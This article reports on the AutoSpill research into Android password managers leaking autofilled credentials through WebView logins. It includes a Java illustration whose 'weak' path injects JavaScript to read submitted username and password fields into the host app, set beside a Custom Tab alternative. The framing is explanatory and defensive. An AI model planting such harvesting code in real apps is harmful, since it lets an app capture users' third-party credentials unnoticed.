Researchers from the International Institute of Information Technology (IIIT) Hyderabad revealed a newly discovered attack, AutoSpill, during a presentation at the Black Hat Europe 2023 conference.
AutoSpill targets popular Android password managers, potentially exposing usernames and passwords.
The attack abuses Android's WebView component, which apps commonly use to render web content inside the app, including third-party sign-in pages such as those of Microsoft, Google, and Apple, so that users can log in without being handed off to the main browser.
Android password managers, working through the platform's autofill framework, also fill stored credentials into login pages displayed in a WebView.
AutoSpill exploits this process: when an app presents a login page in a WebView and the password manager autofills it, the username and password can be captured by the host app itself rather than reaching only the web page they were intended for.
The researchers attribute the flaw to Android's lack of clear guidance on who is responsible for securely handling autofilled data in WebView-based logins, which lets a malicious host app obtain the credentials without the user noticing anything unusual.
The researchers tested the attack on devices running Android 10, 11, and 12 and found that popular password managers, including 1Password, Keeper, Enpass, Keepass2Android, and LastPass, leaked credentials even without JavaScript injection.
Google Smart Lock and Dashlane were not affected by this basic variant because they take a different technical approach to autofill. However, every password manager tested, those two included, could be exploited once JavaScript injection was used.
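To make the JavaScript-injection variant concrete, here is an added illustration written for this page; it is not code from the IIIT Hyderabad paper, from Google, or from any password manager, and it does not reproduce the researchers' non-JavaScript technique. The package name, class name, and login URL are hypothetical. The weak path shows why a login page rendered in a host app's WebView is only as trustworthy as the host: once the host enables JavaScript and registers a bridge, it can read whatever the password manager autofills into the page. The hardened path hands third-party login to the browser through a Chrome Custom Tab, where the host app cannot script the page at all.

```java
// Added illustration for this article; not the researchers' code or any vendor's.
// Package, class and URL are hypothetical.
package com.example.autospilldemo;

import android.app.Activity;
import android.net.Uri;
import android.os.Bundle;
import android.webkit.JavascriptInterface;
import android.webkit.WebView;
import android.webkit.WebViewClient;
import androidx.browser.customtabs.CustomTabsIntent;

public class LoginActivity extends Activity {

    // Hypothetical identity-provider login page shown inside the app.
    private static final String LOGIN_URL = "https://accounts.example.com/login";

    // Script the host app injects once the page has loaded. It waits for the
    // form to be submitted (i.e. after the password manager has filled it in)
    // and passes the field values to native code via the bridge registered below.
    private static final String HARVEST_JS =
        "(function(){"
      + "  var f = document.querySelector('form');"
      + "  if (!f) return;"
      + "  f.addEventListener('submit', function(){"
      + "    var u = document.querySelector('input[type=email],input[name=username],input[type=text]');"
      + "    var p = document.querySelector('input[type=password]');"
      + "    HostBridge.onCredentials(u ? u.value : '', p ? p.value : '');"
      + "  }, true);"
      + "})();";

    @Override
    protected void onCreate(Bundle savedInstanceState) {
        super.onCreate(savedInstanceState);
        loginInCustomTab(LOGIN_URL);   // the hardened path; loginInWebView is the weak one
    }

    // WEAK: embedded WebView with JavaScript enabled and a bridge back into
    // native code. Nothing in Android stops the host from reading the autofilled
    // credentials; the password manager cannot tell a benign host from a hostile one.
    void loginInWebView(String loginUrl) {
        WebView wv = new WebView(this);
        wv.getSettings().setJavaScriptEnabled(true);
        wv.addJavascriptInterface(new HostBridge(), "HostBridge");
        wv.setWebViewClient(new WebViewClient() {
            @Override
            public void onPageFinished(WebView view, String url) {
                view.evaluateJavascript(HARVEST_JS, null);   // injection point
            }
        });
        setContentView(wv);
        wv.loadUrl(loginUrl);
    }

    static class HostBridge {
        @JavascriptInterface
        public void onCredentials(String user, String pass) {
            // The host app now holds the user's credentials for a third-party site.
        }
    }

    // HARDENED: open the login page in a Custom Tab. The page runs in the
    // browser's process, the host app cannot inject script into it, and the
    // app only receives what the identity provider returns through its
    // redirect URI (for example an OAuth authorization code).
    void loginInCustomTab(String loginUrl) {
        CustomTabsIntent tab = new CustomTabsIntent.Builder().build();
        tab.launchUrl(this, Uri.parse(loginUrl));
    }
}
```

The practical check for app developers and reviewers follows from the weak path: any WebView that loads a third-party login page with `setJavaScriptEnabled(true)`, `addJavascriptInterface`, or `evaluateJavascript` calls on that page should be treated as having full access to the credentials entered there, whether typed or autofilled. Custom Tabs (or the system browser) remove that access; they do not, on their own, address the non-JavaScript leak the researchers describe, which depends on how the password manager handles autofill for WebView content.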
The researchers disclosed their findings to the Android security team and to the affected password manager developers, all of whom acknowledged the vulnerabilities. The aim of that coordination is to fix the identified issues and improve the security of Android password managers.